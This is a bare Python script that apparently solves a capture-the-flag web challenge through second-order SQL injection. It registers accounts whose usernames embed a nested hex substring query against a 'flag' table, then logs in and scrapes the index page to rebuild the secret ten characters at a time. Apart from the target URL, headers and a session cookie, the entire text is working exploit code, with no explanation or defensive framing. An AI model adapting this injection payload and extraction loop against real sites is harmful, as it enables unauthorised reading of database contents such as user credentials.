1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| import requests import re
url="http://111.198.29.45:54295/" r=requests.session() hearders={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Referer": "http://111.198.29.45:54295/register.php", "Content-Type": "application/x-www-form-urlencoded", "Host" : "111.198.29.45:54295", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Upgrade-Insecure-Requests": "1", "Connection": "close" } pattern=re.compile(r'name">\n(.*)<')
def payload(i): regist={"email":"{}@a.a".format(i+10), "username":"0'%2B(select substr(hex(hex((select * from flag))) from {} for 10))%2B'0".format(i*10+1), "password":"sa" } return regist
registDict=[ payload(i) for i in range(10) ] flag="" try: for i in range(10): r.headers.update(hearders) t=r.post(url+"register.php",data=registDict[i],headers=hearders,cookies={"PHPSESSID":"l2vegj57h3fvbm5bgrkm3kvcj0"}) if(t.status_code == 302): r.post(url+"login.php",data={"email":registDict[i]['email'],"password":registDict[i]['password']}) cont=r.get(url+"index.php") res=pattern.search(cont.text) res=res.group(1).strip() flag=flag+res print(flag) else: print("注册失败{}".format(registDict[i]))
except requests.RequestException as e: print(e)
|